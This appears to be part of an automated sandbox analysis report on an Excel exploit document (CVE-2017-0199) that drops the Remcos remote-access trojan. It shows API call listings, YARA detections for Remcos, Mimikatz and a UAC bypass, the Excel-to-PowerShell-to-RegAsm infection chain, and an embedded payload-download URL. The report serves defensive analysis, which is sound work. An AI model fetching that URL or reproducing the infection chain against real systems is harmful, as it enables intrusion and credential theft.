                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,14_2_0041330D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle,14_2_0041BBC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle,14_2_0041BB9A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00401806 NtdllDefWindowProc_W,15_2_00401806
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004018C0 NtdllDefWindowProc_W,15_2_004018C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004016FD NtdllDefWindowProc_A,16_2_004016FD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004017B7 NtdllDefWindowProc_A,16_2_004017B7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00402CAC NtdllDefWindowProc_A,17_2_00402CAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00402D66 NtdllDefWindowProc_A,17_2_00402D66
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,14_2_004167EF
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00294D5812_2_00294D58
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00294D4812_2_00294D48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043706A14_2_0043706A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041400514_2_00414005
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043E11C14_2_0043E11C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004541D914_2_004541D9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004381E814_2_004381E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041F18B14_2_0041F18B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044627014_2_00446270
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043E34B14_2_0043E34B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004533AB14_2_004533AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0042742E14_2_0042742E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043756614_2_00437566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043E5A814_2_0043E5A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004387F014_2_004387F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043797E14_2_0043797E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004339D714_2_004339D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044DA4914_2_0044DA49
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00427AD714_2_00427AD7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041DBF314_2_0041DBF3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00427C4014_2_00427C40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00437DB314_2_00437DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00435EEB14_2_00435EEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043DEED14_2_0043DEED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00426E9F14_2_00426E9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_1001719414_2_10017194
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_1000B5C114_2_1000B5C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044B04015_2_0044B040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0043610D15_2_0043610D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044731015_2_00447310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044A49015_2_0044A490
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040755A15_2_0040755A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0043C56015_2_0043C560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044B61015_2_0044B610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044D6C015_2_0044D6C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004476F015_2_004476F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044B87015_2_0044B870
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044081D15_2_0044081D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0041495715_2_00414957
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004079EE15_2_004079EE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00407AEB15_2_00407AEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044AA8015_2_0044AA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00412AA915_2_00412AA9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404B7415_2_00404B74
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404B0315_2_00404B03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044BBD815_2_0044BBD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404BE515_2_00404BE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404C7615_2_00404C76
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00415CFE15_2_00415CFE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00416D7215_2_00416D72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00446D3015_2_00446D30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00446D8B15_2_00446D8B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00406E8F15_2_00406E8F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040503816_2_00405038
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041208C16_2_0041208C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004050A916_2_004050A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040511A16_2_0040511A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043C13A16_2_0043C13A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004051AB16_2_004051AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044930016_2_00449300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040D32216_2_0040D322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044A4F016_2_0044A4F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043A5AB16_2_0043A5AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041363116_2_00413631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044669016_2_00446690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044A73016_2_0044A730
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004398D816_2_004398D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004498E016_2_004498E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044A88616_2_0044A886
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043DA0916_2_0043DA09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00438D5E16_2_00438D5E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00449ED016_2_00449ED0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041FE8316_2_0041FE83
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00430F5416_2_00430F54
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004050C217_2_004050C2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004014AB17_2_004014AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040513317_2_00405133
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004051A417_2_004051A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040124617_2_00401246
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040CA4617_2_0040CA46
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040523517_2_00405235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004032C817_2_004032C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040168917_2_00401689
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00402F6017_2_00402F60
                  Source: SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsxOLE indicator, VBA macros: true
                  Source: SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsxStream path 'MBD00533CD9/\x1Ole' : https://zhort.de/UlEYs1f!i3~l& P@j!xn;3=3\7,e03Y-ujIOCtA58ItTDtFyHDfH2O20sjl3RS1dFyURpFm4F4y33vyEjfA2G85qDJZzAri5P9dXKKVDGqakVtafZvJ15mkZNIDQjVQRx0H7FAnkFojkIJ2f7T,5DbRPYj7Do
                  Source: ~WRF{5CA061CB-7A8F-4A69-A3FF-239624BEF21A}.tmp.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004169A7 appears 87 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004165FF appears 35 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434801 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00422297 appears 42 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E70 appears 54 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 49 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0044DB70 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 35 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00444B5A appears 37 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413025 appears 79 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00416760 appears 69 times
                  Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 12.2.powershell.exe.417eb20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 12.2.powershell.exe.417eb20.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 12.2.powershell.exe.417eb20.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 12.2.powershell.exe.417eb20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 12.2.powershell.exe.417eb20.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 12.2.powershell.exe.417eb20.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 3308, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 2900, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 2900, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: Process Memory Space: powershell.exe PID: 2900, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: RegAsm.exe PID: 2496, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9C7AC5D.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                  Source: bhvA42C.tmp.15.drBinary or memory string: org.slneighbors
                  Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winXLSX@19/30@10/5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,15_2_004182CE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,14_2_0041798D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,17_2_00410DE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,15_2_00418758
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,14_2_0040F4AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,14_2_0041B539
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,14_2_0041AADB
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsxJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-4CT19T
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7712.tmpJump to behavior
                  Source: SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsxOLE indicator, Workbook stream: true
                  Source: F9430000.0.drOLE indicator, Workbook stream: true
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................T.r.u.e.(.P.............................yk.........................s..............#...............#.............Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ....................................u.e.(.P..............................k.........................s..............#.............H...............Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: HandleInformationJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: RegAsm.exe, RegAsm.exe, 00000010.00000002.455705114.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
